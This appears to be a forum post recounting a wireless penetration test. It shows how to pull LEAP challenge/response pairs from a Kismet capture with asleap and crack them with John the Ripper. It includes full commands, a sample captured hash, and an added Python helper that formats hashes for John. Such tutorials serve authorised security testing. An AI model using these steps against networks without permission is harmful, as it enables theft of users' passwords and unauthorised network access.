I recently performed a pen-test at a client site running LEAP. I thought I would document the process, not only to show others how, but for future reference.
To start, we are assuming you've run kismet on the site and determined they are using LEAP. Kismet will create a .dump file in the local directory from which you are running the tool. Within this dump file are the LEAP challenge and responses. Depending on the amount of traffic, you will get either of these responses from ASLEAP:
Code:
asleap -r Kismet-Apr-29-2008-1.dump
asleap 1.4 - actively recover LEAP/PPTP passwords. <jwright@hasborg.com>
Using the passive attack method.
Closing pcap ...
This one didn't have any challenge/responses. Now this one:
Code:
asleap -r Kismet-Apr-29-2008-1.dump
asleap 1.4 - actively recover LEAP/PPTP passwords. <jwright@hasborg.com>
Using the passive attack method.
Captured LEAP exchange information:
username: <removed>
challenge: d9b6a14378985feb
response: 5540fd69295648c3db33e2217dbd3d0157f3a8f2c2ee1603
hash bytes: 6fd3
Now that we have a usable dump file, we can run a dictionary against the LEAP exchange. Prior to version 1.4 of asleap, you would have to use genkeys to generate a lookup file. Version 1.4 allows you to provide an ASCII dictionary directly with the -W option.
Here's what we do:
Code:
asleap -r Kismet-Apr-29-2008-1.dump -W some_dictionary.txt
Depending on the size of your dictionary, and the password policy of the client, you may get the NT hash for the user. With this you can easily crack it with plain-text.info rainbow tables.
Worst case scenario, you get this response from asleap:
Code:
Could not find a matching NT hash. Try expanding your password list. I've given up. Sorry it didn't work out.
Closing pcap ...
This is where John the Ripper comes in. John can take the challenge/response from asleap and attempt to run a hybrid attack against it, brute forcing based upon your dictionary! Here's how:
First, you must provide John a properly formatted challenge/response string. I used nano to do this. Open a blank document and copy the username, response, and challenge to the empty document using this format (the fields are user, domain, LM response, NT response, and challenge; domain and LM response are left empty):
username::::response:challenge
Mine looked like this:
Code:
<removed>::::5540fd69295648c3db33e2217dbd3d0157f3a8f2c2ee1603:d9b6a14378985feb
Save the file and run john, requesting the NETNTLM format, and give it your text file:
Code:
john --format=NETNTLM textfile.txt --wordlist=yourdictionary.txt --rules
Loaded 1 password hash (LM C/R DES [netlm]
John will make three passes against your input. It will run your dictionary, then your dictionary with appended characters, and finally a brute force. Press the space bar as john is running to see progress. The (1) (2) (3) will tell you which stage John is in. Stage three will take a long time! Your best bet is to have a comprehensive dictionary that can crack the password in stage 1 or 2. Also, knowing the client's password policy would be very helpful in determining the level of success you may have.
Edit 7-15-08:
To attempt LM hashes, change your input file to have three colons followed by two colons.
Code:
<removed>:::5540fd69295648c3db33e2217dbd3d0157f3a8f2c2ee1603::d9b6a14378985feb
Your john command would be:
Code:
john --format=NETLM textfile.txt --wordlist=yourdictionary.txt --rules
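Since the NETNTLM and NETLM input lines above differ only in which colon-separated slot the response occupies, it is easy to get the colon count wrong by hand. The following is an added example (my own code, not part of the original post and not asleap's or John's code) that reads the "Captured LEAP exchange information" block as asleap 1.4 prints it and emits both john input lines, refusing values john could not load (wrong hex lengths, a colon in the user name) and returning nothing for a dump with no captured exchange. The sample output embedded below is constructed to match the post; the field layout "user::domain:LMresponse:NTresponse:challenge" is my reading of john's NETNTLM/NETLM format.

```python
import re

# Constructed sample in the shape of the asleap 1.4 output quoted in the post
# (username blanked, challenge/response values as shown there).
SAMPLE_ASLEAP_OUTPUT = """\
asleap 1.4 - actively recover LEAP/PPTP passwords. <jwright@hasborg.com>
Using the passive attack method.
Captured LEAP exchange information:
username: <removed>
challenge: d9b6a14378985feb
response: 5540fd69295648c3db33e2217dbd3d0157f3a8f2c2ee1603
hash bytes: 6fd3
Closing pcap ...
"""

# Constructed sample of the "no challenge/responses" case from the post.
SAMPLE_EMPTY_OUTPUT = """\
asleap 1.4 - actively recover LEAP/PPTP passwords. <jwright@hasborg.com>
Using the passive attack method.
Closing pcap ...
"""

BLOCK_START = "Captured LEAP exchange information"
# asleap prints "name: value"; accept either spaces or tabs between them.
FIELD_RE = re.compile(r"^\s*(username|challenge|response):\s*(\S+)\s*$")
REQUIRED = {"username", "challenge", "response"}


def parse_asleap_exchanges(text):
    """Return one dict per complete 'Captured LEAP exchange information' block.

    Blocks missing any of username/challenge/response are dropped, so a dump
    with no captured exchange yields an empty list.
    """
    exchanges, current = [], None
    for line in text.splitlines():
        if line.startswith(BLOCK_START):
            current = {}
            exchanges.append(current)
            continue
        m = FIELD_RE.match(line)
        if m and current is not None:
            current[m.group(1)] = m.group(2)
    return [e for e in exchanges if REQUIRED <= e.keys()]


def validate_exchange(exchange):
    """Reject values john cannot load: bad hex lengths or a colon in the user name."""
    if ":" in exchange["username"]:
        raise ValueError("username must not contain ':' (it is the field separator)")
    if not re.fullmatch(r"[0-9a-fA-F]{16}", exchange["challenge"]):
        raise ValueError("challenge must be 8 bytes (16 hex chars)")
    if not re.fullmatch(r"[0-9a-fA-F]{48}", exchange["response"]):
        raise ValueError("response must be 24 bytes (48 hex chars)")
    return exchange


def to_netntlm_line(exchange):
    """user::domain:LMresponse:NTresponse:challenge, domain and LM slot empty."""
    e = validate_exchange(exchange)
    return f"{e['username']}::::{e['response']}:{e['challenge']}"


def to_netlm_line(exchange):
    """Same field order, but the response goes in the LM slot and NT is left empty."""
    e = validate_exchange(exchange)
    return f"{e['username']}:::{e['response']}::{e['challenge']}"


if __name__ == "__main__":
    for ex in parse_asleap_exchanges(SAMPLE_ASLEAP_OUTPUT):
        print("NETNTLM:", to_netntlm_line(ex))
        print("NETLM:  ", to_netlm_line(ex))
```

Pipe asleap's output into a file and feed that file's text to parse_asleap_exchanges; writing the returned line to textfile.txt gives exactly the input the two john commands above expect.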
John stores the cracked hashes in the john.pot file for future reference. So, if you try to crack an account that was already successful, you won't get any results, because John sees the hash is already in john.pot; use --show to display the previously cracked passwords.
Hope this helps some of you out!
William